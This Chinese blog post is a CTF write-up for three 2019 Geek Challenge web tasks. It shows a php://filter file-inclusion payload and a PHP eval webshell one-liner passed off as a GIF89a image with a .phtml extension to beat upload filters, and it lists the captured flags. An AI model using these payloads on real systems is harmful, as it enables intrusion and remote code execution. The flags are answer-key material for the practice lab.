【极客大挑战】Day6

最新推荐文章于 2024-07-30 23:33:07 发布
最新推荐文章于 2024-07-30 23:33:07 发布
阅读量586 收藏 9
点赞数 19
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80155614/article/details/136122403
版权

[极客大挑战 2019]Secret File

考察知识点:bp抓包,文件包含,伪协议

查看页面源代码,发现

进去看看

仍然没啥用,再次查看源代码,发现action.php,进去看看直接到了end页面,猜测反应太快,试试抓包

发现secr3t.php

之后为

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

代码解析

如果$file包含"../"、"tp"、"input"或"data"(不区分大小写),则脚本会输出"Oh no!"并终止执行。

禁用了一部分伪协议的关键词,那么就用php://filter伪协议

?file=php://filter/read=convert.base64-encode/resource=xx.php

base解密

flag{3dbc981c-5d2a-4f52-895b-86ae37448724}

[极客大挑战 2019]Knife

考点:webshell工具(蚁剑)使用

flag{7d88923e-1f22-4ddb-b617-94caed8ed17c}

[极客大挑战 2019]Upload

考点:文件上传

先上传一句话木马试试

这时选择抓包,修改上传格式)(每次抓包时需修改上传格式)

结果

文件绕过的格式也有很php,php3,php4,php5,phtml.pht

在这里选择phtml,这个是可以的

结果

就是我的文件中包含了<?,需要过滤掉

使用 script标签 绕过“<?”限制

<script language="php">eval($_POST['pass']);</script>

结果

使用 GIF89a 图片头文件欺骗 php会检测其为gif图片

添加GIF89a

上传成功,用蚁剑连接

根目录下找到

flag{abc83cc3-ea98-4402-97c1-021526640621}

是小嗨嗨啊
关注
极客挑战2023 misc 部分wp
m0_72135419的博客
11-28 1079
公众号发送flag获取图片后查看lsb隐写。
极客挑战2019(复习一下漏洞)
qq_62046696的博客
07-17 1138
这种一般都是备份文件了,其实不太喜欢备份文件,扫目录太慢了,打开dirsearch进行扫目录了,其实是先尝试了一下index.php.bak发现没有,扫出来了www.zip。这道题难就难在,不按套路出牌,Flaaaag里面的f14gawsl字段,里面的值时NO,真正的flag在F1nal1y表里面的password字段。2、再尝试闭合方式,账号输入1,1’,1"判断,当输入为1’时报错,所以判断结果语句应该为单引号闭合(提示记得密码填上东西)...
[极客挑战 2019]Http1
2301_79964672的博客
07-23 1023
HTTP Referer(实际上正确的拼写应该是 "referrer",但遵循传统,通常写作 "referer")是一个HTTP请求头字段,它指示一个请求是从哪个页面发起的。HTTP数据包,通常指的是HTTP消息,它由两部分组成:请求行(对于请求消息)或状态行(对于响应消息),以及随后的一系列头部字段(headers),最后是消息体(body,可选)。是一个 HTTP 请求头字段,用于识别通过代理服务器或负载均衡器连接到 Web 服务器的客户端的原始 IP 地址。来分析流量来源,了解访问者的真实 IP。
day1-1[极客挑战 2019]EasySQL
Moyv的博客
01-22 72
[极客挑战 2019]EasySQL
极客挑战2019-upload1
2301_79964672的博客
07-13 394
GIF(Graphics Interchange Format)是一种广泛使用的图像文件格式,它支持无损压缩,并且可以包含多帧图像,从而实现动画效果。元素的一个属性,用于指定表单数据的编码类型。当表单需要上传文件时,这个属性是必需的。它允许表单数据以二进制形式发送,这样文件就可以作为请求的一部分被上传。在这个例子中,当用户填写用户名并选择一个文件后,点击提交按钮,表单数据将通过 POST 方法发送到服务器的。是稍后发布的版本,它增加了对动画的支持。将文件头对应该背景的文件头,该背景也是GIF。
[极客挑战 2019]BabySQL1
2301_79964672的博客
07-30 1002
尝试1’ order by 3# 发现order中的or被过滤,同时by也被过滤。可看出information,from,where被过滤。使用万能钥匙突破,突破失败,同时发现是字符型。它们两都一样,细心的你能找出问题吗。因此直接尝试联合注入。
第九届极客挑战 部分WP
weixin_30446613的博客
11-19 515
CODE 和0xpoker分0day 百度 取石子游戏。 https://blog.csdn.net/qq_33765907/article/details/51174524 已经说得很详细了,慢慢来就好了。 IOT 无题 流量分析题目,wireshark打开。 文件->导出对象->HTTP MISC 钢铁是怎样炼成的 https://pan.baidu.com/s/1DPuBC...
day1-5[极客挑战 2019]Secret File
Moyv的博客
01-22 149
[极客挑战 2019]Secret File
day1-2[极客挑战 2019]Havefun
Moyv的博客
01-22 65
[极客挑战 2019]Havefun
GO七天开发挑战:7天实现Web框架-Gee(day 3 前缀树路由Router)
weixin_41804479的博客
09-25 846
其中,roots 是请求的路由对应的树根节点,用于判断路由是否匹配,起始的树节点为 GET/POST等请求类型节点(key eg, roots['GET'] roots['POST']);否则查找子树中所有可以匹配的节点,遍历这些节点,递归查找下一层是否匹配,直至找到完全匹配路由的叶子节点,并将该叶子节点返回。(2) 查找子树中所有可能的匹配:遍历当前节点对象的所有子节点,将所有可匹配的节点放入 slice 中,遍历所有节点后,返回 slice。根据请求的类型以及路由找到匹配的节点后,返回对应的响应内容。
本人亲自整理的极客时间设计模式之美的硬核笔记
菼执的博客
10-20 4035
由于笔记内容过多,我把它放到语雀上了。 点击我
GO七天开发挑战:7天实现Web框架-Gee(day 4 分组控制Group)
weixin_41804479的博客
09-30 739
这里的分组是指对可以进行相似处理的路由进行分组,是否分为一个组通常是以前缀进行区分,例如 /admin 为一个分组,那么 /admin/a 和 /admin/b 就是该分组下的子分组。如果没有分组控制,那么就需要对这两个不同的路由分别进行控制,会增加不必要的工作,也会增加路由控制的难度和复杂度。此外,分组支持嵌套,父分组的功能应该可以作用到子分组上,例如 /admin分组应该包含顶层分组 / 的相关处理。分组需要通过前缀来对分组进行区分,所以包含 string 类型的 prefix;
2021-06-18 CTF Webbuuoj day14
LiNa_lInA_741的博客
06-20 522
CTF Web buu oj day14[极客挑战 2019]Upload类型解题 [极客挑战 2019]Upload 类型 文件上传 解题
BUUCTF__web题解合集(九)
风过江南乱的博客
09-23 1066
1、[GYCTF2020]FlaskApp 2、[NPUCTF2020]ReadlezPHP 3、[MRCTF2020]Ezpop 4、[极客挑战 2019]RCE ME 5、[CISCN2019 总决赛 Day2 Web1]Easyweb、
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8472
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
多媒体素材库系统 基于Springboot和Mysql的多媒体素材库系统代码(程序,中文注释)
09-27
多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统 1、资源说明:多媒体素材库系统源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:SpringBo
PyOpenGL-3.1.5.tar.zip
最新发布
09-27
opengl安装包
Qt内置图标,独立头文件
09-27
Qt内置图标,独立头文件
极客挑战 2019]EasySQL
09-03
EasySQL 是极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

是小嗨嗨啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值